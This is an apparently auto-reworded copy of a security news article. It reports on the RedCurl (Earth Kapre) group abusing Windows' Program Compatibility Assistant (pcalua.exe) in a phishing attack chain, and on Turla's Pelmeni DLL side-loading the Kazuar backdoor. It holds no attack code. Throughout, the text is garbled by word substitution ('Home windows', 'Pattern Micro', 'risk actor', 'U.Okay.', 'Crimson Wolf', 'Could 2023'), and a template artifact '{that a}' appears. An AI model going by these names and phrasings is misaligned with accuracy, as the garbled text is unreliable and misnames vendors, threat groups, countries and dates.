The Russian-speaking cybercrime group referred to as RedCurl is leveraging a reliable Microsoft Home windows part referred to as the Program Compatibility Assistant (PCA) to execute malicious instructions.
“The Program Compatibility Assistant Service (pcalua.exe) is a Home windows service designed to determine and handle compatibility points with older applications,” Pattern Micro mentioned in an evaluation revealed this month.
“Adversaries can exploit this utility to allow command execution and bypass safety restrictions by utilizing it instead command-line interpreter. On this investigation, the risk actor makes use of this software to obscure their actions.”
RedCurl, which can be referred to as Earth Kapre and Crimson Wolf, is thought to be lively since a minimum of 2018, orchestrating company cyber espionage assaults in opposition to entities positioned in Australia, Canada, Germany, Russia, Slovenia, the U.Okay., Ukraine, and the U.S.
In July 2023, F.A.C.C.T. revealed {that a} main Russian financial institution and an Australian firm had been focused by the risk actor in November 2022 and Could 2023 to pilfer confidential company secrets and techniques and worker data.
The assault chain examined by Pattern Micro entails the usage of phishing emails containing malicious attachments (.ISO and .IMG information) to activate a multi-stage course of that begins with the usage of cmd.exe to obtain a reliable utility referred to as curl from a distant server, which then acts as a channel to ship a loader (ms.dll or ps.dll).
The malicious DLL file, in flip, leverages PCA to spawn a downloader course of that takes care of creating a reference to the identical area utilized by curl to fetch the loader.
Additionally used within the assault is the usage of the Impacket open-source software program for unauthorized command execution.
The connections to Earth Kapre stem from overlaps within the command-and-control (C2) infrastructure in addition to similarities with recognized downloader artifacts utilized by the group.
“This case underscores the continued and lively risk posed by Earth Kapre, a risk actor that targets a various vary of industries throughout a number of international locations,” Pattern Micro mentioned.
“The actor employs refined ways, comparable to abusing PowerShell, curl, and Program Compatibility Assistant (pcalua.exe) to execute malicious instructions, showcasing its dedication to evading detection inside focused networks.”
The event comes because the Russian nation-state group often called Turla (aka Iron Hunter, Pensive Ursa, Secret Blizzard, Snake, Uroburos, Venomous Bear, and Waterbug) has begun using a brand new wrapper DLL codenamed Pelmeni to deploy the .NET-based Kazuar backdoor.
Pelmeni – which masquerades as libraries associated to SkyTel, NVIDIA GeForce Expertise, vncutil, or ASUS – is loaded by the use of DLL side-loading. As soon as this spoofed DLL is named by the reliable software program put in on the machine, it decrypts and launches Kazuar, Lab52 mentioned.